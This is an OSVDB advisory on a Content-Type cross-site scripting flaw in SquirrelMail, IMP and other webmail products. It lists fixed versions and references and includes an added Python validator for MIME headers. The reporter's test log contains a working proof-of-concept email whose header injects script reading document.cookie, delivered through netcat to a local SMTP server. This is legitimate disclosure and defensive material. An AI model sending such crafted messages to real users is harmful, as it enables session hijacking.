Multiple Webmail mime.php Content-Type XSS

2004-05-29T03:57:33
ID OSVDB:6514
Type osvdb
Reporter Román Medina-Heigl Hernández (roman@rs-labs.com)
Modified 2004-05-29T03:57:33

Description

Vulnerability Description

Multiple webmail products contain a flaw that allows a remote cross-site scripting attack. The flaw exists because the application does not validate the Content-Type header value that it passes to the mime.php script (or whichever script controls the header's Content-Type). This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

Solution Description

An upgrade is required to fix this vulnerability. Upgrade to the following version, depending on the product:

Squirrelmail: 1.4.3 or 1.5.1
IMP: 3.2.4
OpenWebmail: 2.40
IlohaMail: 0.8.13
Sqwebmail: 4.0.5
BasiliX: 1.1.1_fix1

Manual Testing Notes

Testing with UW IMAP:

roman@rs-labs:~/squirrel/bug-new$ cat XSS-PoC-Squirrelmail.withquotes
helo rs-labs-r0cks
mail from:<evil@microsoft.com>
rcpt to:<squirrel@rs-labs>
data
From: Attacker <evil@microsoft.com>
To: roman@rs-labs.com
Subject: Squirrelmail XSS PoC (without quotes)
Date: Sun, 09 May 2004 22:39:58 +0200
Message-ID: <fm5t90tbzeglvqso0hc3j9u3doqc6sj5r5@4ax.com>
X-Mailer: RoMaNSoFt's preferred one :-)
MIME-Version: 1.0
Content-Type: application/octet-stream"<script>window.alert(document.cookie)</script>"; name=top_secret.pdf
Content-Transfer-Encoding: base64
Content-Description: Not really top secret... (without quotes)
Content-Disposition: attachment; filename=top_secret.pdf

JVBERi0xLjMKJeLjz9MKMSAwIG9iago8PAovTGVuZ3RoIDEyMTUKL0ZpbHRlciBbL0ZsYXRlRGVj
dHhyZWYKNDY2MjUKJSVFT0YK
.
quit
roman@rs-labs:~/squirrel/bug-new$ nc localhost 25 < XSS-PoC-Squirrelmail.withquotes
220 rs-labs ESMTP Exim 3.36 #1 Sun, 23 May 2004 22:52:24 +0200
250 rs-labs Hello localhost [127.0.0.1]
250 <evil@microsoft.com> is syntactically correct
250 <squirrel@rs-labs> verified
354 Enter message, ending with "." on a line by itself
250 OK id=1BRzxI-0006KA-00
221 rs-labs closing connection
roman@rs-labs:~/squirrel/bug-new$ nc localhost 143 < imap
* OK [CAPABILITY IMAP4REV1 LOGIN-REFERRALS STARTTLS AUTH=LOGIN] localhost IMAP4rev1 2003.339 at Sun, 23 May 2004 22:52:26 +0200 (CEST)
0 OK [CAPABILITY IMAP4REV1 IDLE NAMESPACE MAILBOX-REFERRALS BINARY UNSELECT SCAN SORT THREAD=REFERENCES THREAD=ORDEREDSUBJECT MULTIAPPEND] User squirrel authenticated
* 1 EXISTS
* 1 RECENT
* OK [UIDVALIDITY 1084621844] UID validity status
* OK [UIDNEXT 10] Predicted next UID
* FLAGS (\Answered \Flagged \Deleted \Draft \Seen)
* OK [PERMANENTFLAGS ()] Permanent flags
* OK [UNSEEN 1] first unseen message in /var/mail/squirrel
0 OK [READ-ONLY] EXAMINE completed
* SEARCH 1
0 OK SEARCH completed
* 1 FETCH (BODYSTRUCTURE ("APPLICATION" {60}
OCTET-STREAM"<SCRIPT>WINDOW.ALERT(DOCUMENT.COOKIE)</SCRIPT>" ("NAME" "top_secret.pdf") NIL "Not really top secret... (without quotes)" "BASE64" 104 NIL ("ATTACHMENT" ("FILENAME" "top_secret.pdf")) NIL NIL))
0 OK FETCH completed
* BYE rs-labs IMAP4rev1 server terminating connection
0 OK LOGOUT completed
roman@rs-labs:~/squirrel/bug-new$
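The defender-side check that the description calls for, run against the crafted header the PoC message above carries: a strict RFC 2045 parser for the Content-Type value that rejects anything off-grammar (so the raw string is never echoed), with HTML escaping as an independent second layer. This is an added Python example, not code from SquirrelMail or any other affected package; the function names and the fallback type are assumptions.

```python
import html
import re

# RFC 2045 'token': printable ASCII except SPACE, CTLs and tspecials ()<>@,;:\"/[]?=
_TOKEN = r"[!#$%&'*+\-.0-9A-Z^_`a-z{|}~]+"
_QUOTED = r'"(?:[^"\\\r\n]|\\.)*"'          # quoted-string, quoted-pairs allowed
_PARAM = rf";\s*({_TOKEN})=({_TOKEN}|{_QUOTED})"
# The whole value must be type/subtype followed only by well-formed parameters.
_CT_RE = re.compile(rf"\s*({_TOKEN})/({_TOKEN})((?:\s*{_PARAM})*)\s*")
_PARAM_RE = re.compile(_PARAM)
_TOKEN_RE = re.compile(_TOKEN)
FALLBACK = "application/octet-stream"   # assumed safe default for unparsable parts

def parse_content_type(header: str) -> tuple[str, str, dict[str, str]]:
    """Strictly parse a MIME Content-Type value; raise ValueError on anything off-grammar."""
    m = _CT_RE.fullmatch(header)
    if not m:
        raise ValueError(f"malformed Content-Type: {header!r}")
    params = {}
    for pm in _PARAM_RE.finditer(m.group(3)):
        value = pm.group(2)
        if value.startswith('"'):
            value = re.sub(r"\\(.)", r"\1", value[1:-1])   # strip quotes, resolve \x pairs
        params[pm.group(1).lower()] = value
    return m.group(1).lower(), m.group(2).lower(), params

def canonical_content_type(header: str) -> str:
    """Rebuild the value from parsed fields only, or fall back; never echo the raw header."""
    try:
        ctype, subtype, params = parse_content_type(header)
    except ValueError:
        return FALLBACK
    parts = [f"{ctype}/{subtype}"]
    for name, value in params.items():
        if not _TOKEN_RE.fullmatch(value):   # re-quote anything that is not a bare token
            value = '"' + value.replace("\\", "\\\\").replace('"', '\\"') + '"'
        parts.append(f"{name}={value}")
    return "; ".join(parts)

def attachment_type_html(header: str) -> str:
    """HTML-safe text for a part's type: validation first, output escaping as a second layer."""
    return html.escape(canonical_content_type(header))

# Constructed samples: the crafted header from the advisory's PoC message, and a benign one.
POC_HEADER = 'application/octet-stream"<script>window.alert(document.cookie)</script>"; name=top_secret.pdf'
BENIGN_HEADER = 'Application/PDF; name="top secret.pdf"; charset=us-ascii'

if __name__ == "__main__":
    for h in (POC_HEADER, BENIGN_HEADER):
        print(repr(h), "->", attachment_type_html(h))
```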

References:

Vendor URL: http://www.squirrelmail.org/
Vendor URL: http://www.rs-labs.com/adv/RS-Labs-Advisory-2004-1.txt
Vendor URL: http://www.squirrelmail.org/changelog.php
Security Tracker: 1010425
Security Tracker: 1010341
Secunia Advisory ID: 11870
Secunia Advisory ID: 12289
Secunia Advisory ID: 11778
Secunia Advisory ID: 11875
Secunia Advisory ID: 11805
Secunia Advisory ID: 11884
Secunia Advisory ID: 11734
Other Advisory URL: http://www.rs-labs.com/adv/RS-Labs-Advisory-2004-2.txt
Other Advisory URL: http://www.horde.org/imp/3.2/
Other Advisory URL: http://security.gentoo.org/glsa/glsa-200406-11.xml
Other Advisory URL: http://distro.conectiva.com.br/atualizacoes/index.php?id=a&anuncio=000858
Other Advisory URL: http://www.rs-labs.com/adv/RS-Labs-Advisory-2004-1.txt
Other Advisory URL: http://www.gentoo.org/security/en/glsa/glsa-200406-08.xml
Mail List Post: http://marc.theaimsgroup.com/?l=full-disclosure&m=108588315114441&w=2
Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2004-06/0050.html
ISS X-Force ID: 16357
ISS X-Force ID: 16285
CVE-2004-0520
CVE-2004-0584
Bugtraq ID: 10450
Bugtraq ID: 10501
Bugtraq ID: 10439